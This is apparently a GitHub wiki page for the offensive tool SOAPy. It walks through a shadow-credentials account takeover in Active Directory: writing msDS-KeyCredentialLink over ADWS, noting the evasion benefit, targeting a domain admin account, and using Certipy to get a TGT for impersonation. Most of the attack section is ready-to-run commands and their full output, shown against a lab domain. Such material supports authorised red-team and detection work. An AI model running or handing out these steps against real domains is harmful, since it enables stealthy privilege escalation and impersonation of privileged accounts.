-
Notifications
You must be signed in to change notification settings - Fork 41
Post‐Exploitation
SOAPy can be used to write the msDs-KeyCredentialLink attribute over ADWS to take over accounts when holding an Active Directory write permission such as GenericAll or GenericWrite.
Writing attributes over ADWS instead of LDAP may hold opsec benefits when attempting to perform evasive account takeover procedures depending on brittle Active Directory write detection mechanisms.
Performing a shadow credentials operations over ADWS using SOAPy can be done by using the following command:
┌──(kali㉿LG-kali)-[~/SOAPy]
└─$ SOAPy ludus.domain/domainuser:'password'@dc01.ludus.domain --shadow-creds add --shadow-target domainadmin
____ ___ _ ____
/ ___| / _ \ / \ | _ \ _ _
\___ \| | | |/ _ \ | |_) | | | |
___) | |_| / ___ \| __/| |_| |
|____/ \___/_/ \_\_| \__, |
|___/
v1.0.0
@_logangoins
github.com/jlevere
[*] Searching for target account: domainadmin
[*] Connecting to dc01.ludus.domain for resource:Enumeration
[*] Using query: (sAMAccountName=domainadmin)
[*] Using distingushedName: DC=ludus,DC=domain
[+] Target found: CN=domainadmin,CN=Users,DC=ludus,DC=domain
[*] Generating certificate...
[+] Certificate generated
[*] Generating KeyCredential...
[+] KeyCredential generated with DeviceID: bd2b1445-b51a-7c0a-b0cd-3ff5f140ccb4
[*] Connecting to dc01.ludus.domain for resource:Enumeration
[*] Using query: (distinguishedName=CN=domainadmin,CN=Users,DC=ludus,DC=domain)
[*] Using distingushedName: CN=domainadmin,CN=Users,DC=ludus,DC=domain
[*] Updating msDS-KeyCredentialLink attribute...
[*] Connecting to dc01.ludus.domain for resource:Resource
[+] Successfully updated msDS-KeyCredentialLink
[*] No filename provided, using: 2lb6oaZo
[*] No password provided, using: mIcCUy7Bwik9ou0Zutp0
[+] Saved PFX certificate: 2lb6oaZo.pfx
[+] PFX password: mIcCUy7Bwik9ou0Zutp0
Once the msDs-KeyCredentialLink attribute has been written, using the returned certificate for PKINIT authentication will yield a TGT as the target user, allowing impersonation.
┌──(kali㉿LG-kali)-[~/SOAPy]
└─$ certipy auth -pfx 2lb6oaZo.pfx -password mIcCUy7Bwik9ou0Zutp0 -dc-ip 10.2.10.10 -no-hash -domain ludus.domain -username domainadmin
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'domainadmin@ludus.domain'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'domainadmin.ccache'
[*] Wrote credential cache to 'domainadmin.ccache'
This TGT can then be used to authenticate to resources across the network as the impersonated user account.